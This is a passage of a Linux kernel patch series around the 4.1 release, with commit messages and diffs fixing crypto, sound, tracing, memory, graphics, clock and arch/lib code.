ba0532efd3ae..332c8ef8dae2 100644 --- a/drivers/crypto/caam/caamhash.c +++ b/drivers/crypto/caam/caamhash.c @@ -1544,6 +1544,8 @@ static int ahash_init(struct ahash_request *req) state->current_buf = 0; state->buf_dma = 0; + state->buflen_0 = 0; + state->buflen_1 = 0; return 0; } From 412c98c1bef65fe7589f1300e93735d96130307c Mon Sep 17 00:00:00 2001 From: Steve Cornelius Date: Mon, 15 Jun 2015 16:52:59 -0700 Subject: [PATCH 857/872] crypto: caam - fix RNG buffer cache alignment The hwrng output buffers (2) are cast inside of a a struct (caam_rng_ctx) allocated in one DMA-tagged region. While the kernel's heap allocator should place the overall struct on a cacheline aligned boundary, the 2 buffers contained within may not necessarily align. Consenquently, the ends of unaligned buffers may not fully flush, and if so, stale data will be left behind, resulting in small repeating patterns. This fix aligns the buffers inside the struct. Note that not all of the data inside caam_rng_ctx necessarily needs to be DMA-tagged, only the buffers themselves require this. However, a fix would incur the expense of error-handling bloat in the case of allocation failure. Cc: stable@vger.kernel.org Signed-off-by: Steve Cornelius Signed-off-by: Victoria Milhoan Signed-off-by: Herbert Xu --- drivers/crypto/caam/caamrng.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/crypto/caam/caamrng.c b/drivers/crypto/caam/caamrng.c index 26a544b505f1..5095337205b8 100644 --- a/drivers/crypto/caam/caamrng.c +++ b/drivers/crypto/caam/caamrng.c @@ -56,7 +56,7 @@ /* Buffer, its dma address and lock */ struct buf_data { - u8 buf[RN_BUF_SIZE]; + u8 buf[RN_BUF_SIZE] ____cacheline_aligned; dma_addr_t addr; struct completion filled; u32 hw_desc[DESC_JOB_O_LEN]; From 145c0e914d2cd0cf829b8c4cbe24736b3ee81a91 Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Tue, 16 Jun 2015 12:23:36 +0200 Subject: [PATCH 858/872] ALSA: hda - Fix unused label skip_i915 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit When CONFIG_SND_HDA_I915=n, we get a compile warning: sound/pci/hda/hda_intel.c: In function ‘azx_probe_continue’: sound/pci/hda/hda_intel.c:1882:2: warning: label ‘skip_i915’ defined but not used [-Wunused-label] Fix it by putting again ifdef to it. Sigh. Fixes: bf06848bdbe5 ('ALSA: hda - Continue probing even if i915 binding fails') Reported-by: Borislav Petkov Signed-off-by: Takashi Iwai --- sound/pci/hda/hda_intel.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sound/pci/hda/hda_intel.c b/sound/pci/hda/hda_intel.c index a244ba706317..b6db25b23dd3 100644 --- a/sound/pci/hda/hda_intel.c +++ b/sound/pci/hda/hda_intel.c @@ -1879,7 +1879,9 @@ static int azx_probe_continue(struct azx *chip) #endif } +#ifdef CONFIG_SND_HDA_I915 skip_i915: +#endif err = azx_first_init(chip); if (err < 0) goto out_free; From 2cf30dc180cea808077f003c5116388183e54f9e Mon Sep 17 00:00:00 2001 From: Steven Rostedt Date: Mon, 15 Jun 2015 17:50:25 -0400 Subject: [PATCH 859/872] tracing: Have filter check for balanced ops When the following filter is used it causes a warning to trigger: # cd /sys/kernel/debug/tracing # echo "((dev==1)blocks==2)" > events/ext4/ext4_truncate_exit/filter -bash: echo: write error: Invalid argument # cat events/ext4/ext4_truncate_exit/filter ((dev==1)blocks==2) ^ parse_error: No error ------------[ cut here ]------------ WARNING: CPU: 2 PID: 1223 at kernel/trace/trace_events_filter.c:1640 replace_preds+0x3c5/0x990() Modules linked in: bnep lockd grace bluetooth ... CPU: 3 PID: 1223 Comm: bash Tainted: G W 4.1.0-rc3-test+ #450 Hardware name: Hewlett-Packard HP Compaq Pro 6300 SFF/339A, BIOS K01 v02.05 05/07/2012 0000000000000668 ffff8800c106bc98 ffffffff816ed4f9 ffff88011ead0cf0 0000000000000000 ffff8800c106bcd8 ffffffff8107fb07 ffffffff8136b46c ffff8800c7d81d48 ffff8800d4c2bc00 ffff8800d4d4f920 00000000ffffffea Call Trace: [] dump_stack+0x4c/0x6e [] warn_slowpath_common+0x97/0xe0 [] ? _kstrtoull+0x2c/0x80 [] warn_slowpath_null+0x1a/0x20 [] replace_preds+0x3c5/0x990 [] create_filter+0x82/0xb0 [] apply_event_filter+0xd4/0x180 [] event_filter_write+0x8f/0x120 [] __vfs_write+0x28/0xe0 [] ? __sb_start_write+0x53/0xf0 [] ? security_file_permission+0x30/0xc0 [] vfs_write+0xb8/0x1b0 [] SyS_write+0x4f/0xb0 [] system_call_fastpath+0x12/0x6a ---[ end trace e11028bd95818dcd ]--- Worse yet, reading the error message (the filter again) it says that there was no error, when there clearly was. The issue is that the code that checks the input does not check for balanced ops. That is, having an op between a closed parenthesis and the next token. This would only cause a warning, and fail out before doing any real harm, but it should still not caues a warning, and the error reported should work: # cd /sys/kernel/debug/tracing # echo "((dev==1)blocks==2)" > events/ext4/ext4_truncate_exit/filter -bash: echo: write error: Invalid argument # cat events/ext4/ext4_truncate_exit/filter ((dev==1)blocks==2) ^ parse_error: Meaningless filter expression And give no kernel warning. Link: http://lkml.kernel.org/r/20150615175025.7e809215@gandalf.local.home Cc: Peter Zijlstra Cc: Ingo Molnar Cc: Arnaldo Carvalho de Melo Cc: stable@vger.kernel.org # 2.6.31+ Reported-by: Vince Weaver Tested-by: Vince Weaver Signed-off-by: Steven Rostedt --- kernel/trace/trace_events_filter.c | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/kernel/trace/trace_events_filter.c b/kernel/trace/trace_events_filter.c index ced69da0ff55..7f2e97ce71a7 100644 --- a/kernel/trace/trace_events_filter.c +++ b/kernel/trace/trace_events_filter.c @@ -1369,19 +1369,26 @@ static int check_preds(struct filter_parse_state *ps) { int n_normal_preds = 0, n_logical_preds = 0; struct postfix_elt *elt; + int cnt = 0; list_for_each_entry(elt, &ps->postfix, list) { - if (elt->op == OP_NONE) + if (elt->op == OP_NONE) { + cnt++; continue; + } if (elt->op == OP_AND || elt->op == OP_OR) { n_logical_preds++; + cnt--; continue; } + if (elt->op != OP_NOT) + cnt--; n_normal_preds++; + WARN_ON_ONCE(cnt < 0); } - if (!n_normal_preds || n_logical_preds >= n_normal_preds) { + if (cnt != 1 || !n_normal_preds || n_logical_preds >= n_normal_preds) { parse_error(ps, FILT_ERR_INVALID_FILTER, 0); return -EINVAL; } From 8366610283d08564f65a1af2ec8458df08418727 Mon Sep 17 00:00:00 2001 From: Wolfram Sang Date: Mon, 15 Jun 2015 19:51:46 +0200 Subject: [PATCH 860/872] i2c: slave: fix the example how to instantiate from userspace I copied the wrong shell code into the documentation. Sorry to all who tried to get sense out of this current example :/ Slight rewording while we are here. Reported-by: Tim Bakker Signed-off-by: Wolfram Sang Signed-off-by: Wolfram Sang Cc: stable@kernel.org --- Documentation/i2c/slave-interface | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/Documentation/i2c/slave-interface b/Documentation/i2c/slave-interface index 389bb5d61854..b228ca54bcf4 100644 --- a/Documentation/i2c/slave-interface +++ b/Documentation/i2c/slave-interface @@ -31,10 +31,10 @@ User manual =========== I2C slave backends behave like standard I2C clients. So, you can instantiate -them like described in the document 'instantiating-devices'. A quick example -for instantiating the slave-eeprom driver from userspace: +them as described in the document 'instantiating-devices'. A quick example for +instantiating the slave-eeprom driver from userspace at address 0x64 on bus 1: - # echo 0-0064 > /sys/bus/i2c/drivers/i2c-slave-eeprom/bind + # echo slave-24c02 0x64 > /sys/bus/i2c/devices/i2c-1/new_device Each backend should come with separate documentation to describe its specific behaviour and setup. From 66fc13039422ba7df2d01a8ee0873e4ef965b50b Mon Sep 17 00:00:00 2001 From: Hugh Dickins Date: Sun, 14 Jun 2015 09:48:09 -0700 Subject: [PATCH 861/872] mm: shmem_zero_setup skip security check and lockdep conflict with XFS It appears that, at some point last year, XFS made directory handling changes which bring it into lockdep conflict with shmem_zero_setup(): it is surprising that mmap() can clone an inode while holding mmap_sem, but that has been so for many years. Since those few lockdep traces that I've seen all implicated selinux, I'm hoping that we can use the __shmem_file_setup(,,,S_PRIVATE) which v3.13's commit c7277090927a ("security: shmem: implement kernel private shmem inodes") introduced to avoid LSM checks on kernel-internal inodes: the mmap("/dev/zero") cloned inode is indeed a kernel-internal detail. This also covers the !CONFIG_SHMEM use of ramfs to support /dev/zero (and MAP_SHARED|MAP_ANONYMOUS). I thought there were also drivers which cloned inode in mmap(), but if so, I cannot locate them now. Reported-and-tested-by: Prarit Bhargava Reported-and-tested-by: Daniel Wagner Reported-and-tested-by: Morten Stevens Signed-off-by: Hugh Dickins Signed-off-by: Linus Torvalds --- mm/shmem.c | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/mm/shmem.c b/mm/shmem.c index de981370fbc5..47d536e59fc0 100644 --- a/mm/shmem.c +++ b/mm/shmem.c @@ -3401,7 +3401,13 @@ int shmem_zero_setup(struct vm_area_struct *vma) struct file *file; loff_t size = vma->vm_end - vma->vm_start; - file = shmem_file_setup("dev/zero", size, vma->vm_flags); + /* + * Cloning a new file under mmap_sem leads to a lock ordering conflict + * between XFS directory reading and selinux: since this file is only + * accessible to the user through its mapping, use S_PRIVATE flag to + * bypass file security, in the same way as shmem_kernel_file_setup(). + */ + file = __shmem_file_setup("dev/zero", size, vma->vm_flags, S_PRIVATE); if (IS_ERR(file)) return PTR_ERR(file); From 6cea28d01ee834c4437cccab07f3086435de08a4 Mon Sep 17 00:00:00 2001 From: Mauro Carvalho Chehab Date: Tue, 16 Jun 2015 06:26:59 -0300 Subject: [PATCH 862/872] Kconfig: disable Media Controller for DVB Since when we start discussions about the usage Media Controller for complex hardware, one thing become clear: the way it is, MC fails to map anything different than capture/output/m2m video-only streaming. The point is that MC has entities named as devnodes, but the only devnode used (before the DVB patches) is MEDIA_ENT_T_DEVNODE_V4L. Due to the way MC got implemented, however, this entity actually doesn't represent the devnode, but the hardware I/O engine that receives data via DMA. By coincidence, such DMA is associated with the V4L device node on webcam hardware, but this is not true even for other V4L2 devices. For example, on USB hardware, the DMA is done via the USB controller. The data passes though a in-kernel filter that strips off the URB headers. Other V4L2 devices like radio may not even have DMA. When it have, the DMA is done via ALSA, and not via the V4L devnode. In other words, MC is broken as a whole, but tagging it as BROKEN right now would do more harm than good. So, instead, let's mark, for now, the DVB part as broken and block all new changes to MC while we fix this mess, whith we hopefully will do for the next Kernel version. Requested-by: Laurent Pinchart Signed-off-by: Hans Verkuil Acked-by: Laurent Pinchart Signed-off-by: Mauro Carvalho Chehab Signed-off-by: Linus Torvalds --- drivers/media/Kconfig | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/media/Kconfig b/drivers/media/Kconfig index 3ef0f90b128f..157099243d61 100644 --- a/drivers/media/Kconfig +++ b/drivers/media/Kconfig @@ -97,6 +97,7 @@ config MEDIA_CONTROLLER config MEDIA_CONTROLLER_DVB bool "Enable Media controller for DVB" depends on MEDIA_CONTROLLER + depends on BROKEN ---help--- Enable the media controller API support for DVB. From 3bc980bf19bb62007e923691fa2869ba113be895 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Michel=20D=C3=A4nzer?= Date: Tue, 16 Jun 2015 17:28:16 +0900 Subject: [PATCH 863/872] drm/radeon: Add RADEON_INFO_VA_UNMAP_WORKING query MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This tells userspace that it's safe to use the RADEON_VA_UNMAP operation of the DRM_RADEON_GEM_VA ioctl. Cc: stable@vger.kernel.org (NOTE: Backporting this commit requires at least backports of commits 26d4d129b6042197b4cbc8341c0618f99231af2f, 48afbd70ac7b6aa62e8d452091023941d8085f8a and c29c0876ec05d51a93508a39b90b92c29ba6423d as well, otherwise using RADEON_VA_UNMAP runs into trouble) Signed-off-by: Michel Dänzer Signed-off-by: Christian König --- drivers/gpu/drm/radeon/radeon_kms.c | 3 +++ include/uapi/drm/radeon_drm.h | 1 + 2 files changed, 4 insertions(+) diff --git a/drivers/gpu/drm/radeon/radeon_kms.c b/drivers/gpu/drm/radeon/radeon_kms.c index 7b2a7335cc5d..b0acf50d9558 100644 --- a/drivers/gpu/drm/radeon/radeon_kms.c +++ b/drivers/gpu/drm/radeon/radeon_kms.c @@ -576,6 +576,9 @@ static int radeon_info_ioctl(struct drm_device *dev, void *data, struct drm_file if (radeon_get_allowed_info_register(rdev, *value, value)) return -EINVAL; break; + case RADEON_INFO_VA_UNMAP_WORKING: + *value = true; + break; default: DRM_DEBUG_KMS("Invalid request %d\n", info->request); return -EINVAL; diff --git a/include/uapi/drm/radeon_drm.h b/include/uapi/drm/radeon_drm.h index 871e73f99a4d..94d44ab2fda1 100644 --- a/include/uapi/drm/radeon_drm.h +++ b/include/uapi/drm/radeon_drm.h @@ -1038,6 +1038,7 @@ struct drm_radeon_cs { #define RADEON_INFO_CURRENT_GPU_SCLK 0x22 #define RADEON_INFO_CURRENT_GPU_MCLK 0x23 #define RADEON_INFO_READ_REG 0x24 +#define RADEON_INFO_VA_UNMAP_WORKING 0x25 struct drm_radeon_info { uint32_t request; From 7f017e56770e82c8fe2d4d8c59e58f519f455ad7 Mon Sep 17 00:00:00 2001 From: Dave Airlie Date: Thu, 18 Jun 2015 14:29:18 +1000 Subject: [PATCH 864/872] drm/radeon: don't probe MST on hw we don't support it on MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit If you do radeon.mst=1 on a gpu without mst hw, and then plug some mst hw it will oops instead of falling back. So check we have DCE5 at least before proceeding. Signed-off-by: Dave Airlie Signed-off-by: Christian König --- drivers/gpu/drm/radeon/radeon_dp_mst.c | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/drivers/gpu/drm/radeon/radeon_dp_mst.c b/drivers/gpu/drm/radeon/radeon_dp_mst.c index 2b98ed3e684d..257b10be5cda 100644 --- a/drivers/gpu/drm/radeon/radeon_dp_mst.c +++ b/drivers/gpu/drm/radeon/radeon_dp_mst.c @@ -663,12 +663,17 @@ int radeon_dp_mst_probe(struct radeon_connector *radeon_connector) { struct radeon_connector_atom_dig *dig_connector = radeon_connector->con_priv; + struct drm_device *dev = radeon_connector->base.dev; + struct radeon_device *rdev = dev->dev_private; int ret; u8 msg[1]; if (!radeon_mst) return 0; + if (!ASIC_IS_DCE5(rdev)) + return 0; + if (dig_connector->dpcd[DP_DPCD_REV] < 0x12) return 0; From 5ca62d65030d8295f54c490d2072563545dbd9d9 Mon Sep 17 00:00:00 2001 From: Andrew Morton Date: Thu, 18 Jun 2015 11:01:11 -0700 Subject: [PATCH 865/872] revert "cpumask: don't perform while loop in cpumask_next_and()" Revert commit 534b483a86e6 ("cpumask: don't perform while loop in cpumask_next_and()"). This was a minor optimization, but it puts a `struct cpumask' on the stack, which consumes too much stack space. Sergey Senozhatsky Reported-by: Peter Zijlstra Cc: Sergey Senozhatsky Cc: Tejun Heo Cc: "David S. Miller" Cc: Amir Vadai Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- lib/cpumask.c | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/lib/cpumask.c b/lib/cpumask.c index 5f627084f2e9..5a70f6196f57 100644 --- a/lib/cpumask.c +++ b/lib/cpumask.c @@ -16,11 +16,10 @@ int cpumask_next_and(int n, const struct cpumask *src1p, const struct cpumask *src2p) { - struct cpumask tmp; - - if (cpumask_and(&tmp, src1p, src2p)) - return cpumask_next(n, &tmp); - return nr_cpu_ids; + while ((n = cpumask_next(n, src1p)) < nr_cpu_ids) + if (cpumask_test_cpu(n, src2p)) + break; + return n; } EXPORT_SYMBOL(cpumask_next_and); From 6c7b03e1aef2e92176435f4fa562cc483422d20f Mon Sep 17 00:00:00 2001 From: Boris Brezillon Date: Fri, 27 Mar 2015 23:53:15 +0100 Subject: [PATCH 866/872] clk: at91: pll: fix input range validity check The PLL impose a certain input range to work correctly, but it appears that this input range does not apply on the input clock (or parent clock) but on the input clock after it has passed the PLL divisor. Fix the implementation accordingly. Cc: # v3.14+ Signed-off-by: Boris Brezillon Reported-by: Jonas Andersson --- drivers/clk/at91/clk-pll.c | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/drivers/clk/at91/clk-pll.c b/drivers/clk/at91/clk-pll.c index 6ec79dbc0840..cbbe40377ad6 100644 --- a/drivers/clk/at91/clk-pll.c +++ b/drivers/clk/at91/clk-pll.c @@ -173,8 +173,7 @@ static long clk_pll_get_best_div_mul(struct clk_pll *pll, unsigned long rate, int i = 0; /* Check if parent_rate is a valid input rate */ - if (parent_rate < characteristics->input.min || - parent_rate > characteristics->input.max) + if (parent_rate < characteristics->input.min) return -ERANGE; /* @@ -187,6 +186,15 @@ static long clk_pll_get_best_div_mul(struct clk_pll *pll, unsigned long rate, if (!mindiv) mindiv = 1; + if (parent_rate > characteristics->input.max) { + tmpdiv = DIV_ROUND_UP(parent_rate, characteristics->input.max); + if (tmpdiv > PLL_DIV_MAX) + return -ERANGE; + + if (tmpdiv > mindiv) + mindiv = tmpdiv; + } + /* * Calculate the maximum divider which is limited by PLL register * layout (limited by the MUL or DIV field size). From 86e4404af2a812935f6c71e7a33e4d0c3aab6538 Mon Sep 17 00:00:00 2001 From: Boris Brezillon Date: Thu, 28 May 2015 14:01:08 +0200 Subject: [PATCH 867/872] clk: at91: fix PERIPHERAL_MAX_SHIFT definition Fix the PERIPHERAL_MAX_SHIFT definition (3 instead of 4) and adapt the round_rate and set_rate logic accordingly. Signed-off-by: Boris Brezillon Reported-by: "Wu, Songjun" --- drivers/clk/at91/clk-peripheral.c | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/drivers/clk/at91/clk-peripheral.c b/drivers/clk/at91/clk-peripheral.c index 597fed423d7d..df2c1afa52b4 100644 --- a/drivers/clk/at91/clk-peripheral.c +++ b/drivers/clk/at91/clk-peripheral.c @@ -29,7 +29,7 @@ #define PERIPHERAL_RSHIFT_MASK 0x3 #define PERIPHERAL_RSHIFT(val) (((val) >> 16) & PERIPHERAL_RSHIFT_MASK) -#define PERIPHERAL_MAX_SHIFT 4 +#define PERIPHERAL_MAX_SHIFT 3 struct clk_peripheral { struct clk_hw hw; @@ -242,7 +242,7 @@ static long clk_sam9x5_peripheral_round_rate(struct clk_hw *hw, return *parent_rate; if (periph->range.max) { - for (; shift < PERIPHERAL_MAX_SHIFT; shift++) { + for (; shift <= PERIPHERAL_MAX_SHIFT; shift++) { cur_rate = *parent_rate >> shift; if (cur_rate <= periph->range.max) break; @@ -254,7 +254,7 @@ static long clk_sam9x5_peripheral_round_rate(struct clk_hw *hw, best_diff = cur_rate - rate; best_rate = cur_rate; - for (; shift < PERIPHERAL_MAX_SHIFT; shift++) { + for (; shift <= PERIPHERAL_MAX_SHIFT; shift++) { cur_rate = *parent_rate >> shift; if (cur_rate < rate) cur_diff = rate - cur_rate; @@ -289,7 +289,7 @@ static int clk_sam9x5_peripheral_set_rate(struct clk_hw *hw, if (periph->range.max && rate > periph->range.max) return -EINVAL; - for (shift = 0; shift < PERIPHERAL_MAX_SHIFT; shift++) { + for (shift = 0; shift <= PERIPHERAL_MAX_SHIFT; shift++) { if (parent_rate >> shift == rate) { periph->auto_div = false; periph->div = shift; From c49bb94c8430a5697c59fba7a4d876990545d20b Mon Sep 17 00:00:00 2001 From: Nicolas Ferre Date: Wed, 17 Jun 2015 15:22:51 +0200 Subject: [PATCH 868/872] clk: at91: trivial: typo in peripheral clock description Signed-off-by: Nicolas Ferre Signed-off-by: Boris Brezillon --- Documentation/devicetree/bindings/clock/at91-clock.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Documentation/devicetree/bindings/clock/at91-clock.txt b/Documentation/devicetree/bindings/clock/at91-clock.txt index 7a4d4926f44e..5ba6450693b9 100644 --- a/Documentation/devicetree/bindings/clock/at91-clock.txt +++ b/Documentation/devicetree/bindings/clock/at91-clock.txt @@ -248,7 +248,7 @@ Required properties for peripheral clocks: - #address-cells : shall be 1 (reg is used to encode clk id). - clocks : shall be the master clock phandle. e.g. clocks = <&mck>; -- name: device tree node describing a specific system clock. +- name: device tree node describing a specific peripheral clock. * #clock-cells : from common clock binding; shall be set to 0. * reg: peripheral id. See Atmel's datasheets to get a full list of peripheral ids. From 28df9c2fb6f896179fcffd5a3f5a86e2d1dff0a5 Mon Sep 17 00:00:00 2001 From: Nicolas Ferre Date: Thu, 28 May 2015 15:07:21 +0200 Subject: [PATCH 869/872] clk: at91: fix h32mx prototype inclusion in pmc header Trivial fix that prevents to compile this pmc clock driver if h32mx clock is present but smd clock isn't. Signed-off-by: Nicolas Ferre Signed-off-by: Boris Brezillon Acked-by: Alexandre Belloni Fixes: bcc5fd49a0fd ("clk: at91: add a driver for the h32mx clock") Cc: # 3.18+ --- drivers/clk/at91/pmc.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/clk/at91/pmc.h b/drivers/clk/at91/pmc.h index 52d2041fa3f6..af2c99195541 100644 --- a/drivers/clk/at91/pmc.h +++ b/drivers/clk/at91/pmc.h @@ -120,7 +120,7 @@ extern void __init of_at91sam9x5_clk_smd_setup(struct device_node *np, struct at91_pmc *pmc); #endif -#if defined(CONFIG_HAVE_AT91_SMD) +#if defined(CONFIG_HAVE_AT91_H32MX) extern void __init of_sama5d4_clk_h32mx_setup(struct device_node *np, struct at91_pmc *pmc); #endif From b953c0d234bc72e8489d3bf51a276c5c4ec85345 Mon Sep 17 00:00:00 2001 From: Linus Torvalds Date: Sun, 21 Jun 2015 22:05:43 -0700 Subject: [PATCH 870/872] Linux 4.1 --- Makefile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Makefile b/Makefile index 3ba504496cb2..f5c8983aeeb7 100644 --- a/Makefile +++ b/Makefile @@ -1,7 +1,7 @@ VERSION = 4 PATCHLEVEL = 1 SUBLEVEL = 0 -EXTRAVERSION = -rc8 +EXTRAVERSION = NAME = Hurr durr I'ma sheep # *DOCUMENTATION* From b2f5c938b995ed171ca53bf299c8928698fadc9f Mon Sep 17 00:00:00 2001 From: Hajime Tazaki Date: Wed, 24 Jun 2015 15:16:42 +0900 Subject: [PATCH 871/872] lib: delete unused functions clean up unused functions, lib_sock_canrecv and lib_sock_cansend, which have been existed since the begining of DCE. Signed-off-by: Hajime Tazaki --- arch/lib/lib-socket.c | 40 ---------------------------------------- 1 file changed, 40 deletions(-) diff --git a/arch/lib/lib-socket.c b/arch/lib/lib-socket.c index d9be5fc2af41..75760c774288 100644 --- a/arch/lib/lib-socket.c +++ b/arch/lib/lib-socket.c @@ -242,46 +242,6 @@ int lib_sock_getsockopt(struct SimSocket *socket, int level, int optname, return err; } -int lib_sock_canrecv(struct SimSocket *socket) -{ - struct socket *sock = (struct socket *)socket; - struct inet_connection_sock *icsk; - - switch (sock->sk->sk_state) { - case TCP_CLOSE: - if (SOCK_STREAM == sock->sk->sk_type) - return 1; - case TCP_ESTABLISHED: - return sock->sk->sk_receive_queue.qlen > 0; - case TCP_SYN_SENT: - case TCP_SYN_RECV: - case TCP_LAST_ACK: - case TCP_CLOSING: - return 0; - case TCP_FIN_WAIT1: - case TCP_FIN_WAIT2: - case TCP_TIME_WAIT: - case TCP_CLOSE_WAIT: - return 1; - case TCP_LISTEN: - { - icsk = inet_csk(sock->sk); - return !reqsk_queue_empty(&icsk->icsk_accept_queue); - } - - default: - break; - } - - return 0; -} -int lib_sock_cansend(struct SimSocket *socket) -{ - struct socket *sock = (struct socket *)socket; - - return sock_writeable(sock->sk); -} - /** * Struct used to pass pool table context between DCE and Kernel and back from * Kernel to DCE From a0997f4cbd627b81b3fd97d27958ddf16c649bb9 Mon Sep 17 00:00:00 2001 From: Hajime Tazaki Date: Thu, 25 Jun 2015 20:37:06 +0900 Subject: [PATCH 872/872] lib: ensure to clear pending timer list on del_timer this too-much sanity check causes !timer_pending() assert on mod_timer when deleted timer is called with mod_timer(). Fixes: 793e2d6a3069 ('lib: add sanity checks to list_del operation') Signed-off-by: Hajime Tazaki --- arch/lib/timer.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/lib/timer.c b/arch/lib/timer.c index 87d2283a4e01..94b3f5cf6d2f 100644 --- a/arch/lib/timer.c +++ b/arch/lib/timer.c @@ -141,8 +141,8 @@ int del_timer(struct timer_list *timer) retval = 0; if (timer->entry.prev != LIST_POISON2) { list_del(&timer->entry); - timer->entry.next = NULL; } + timer->entry.next = NULL; return retval; }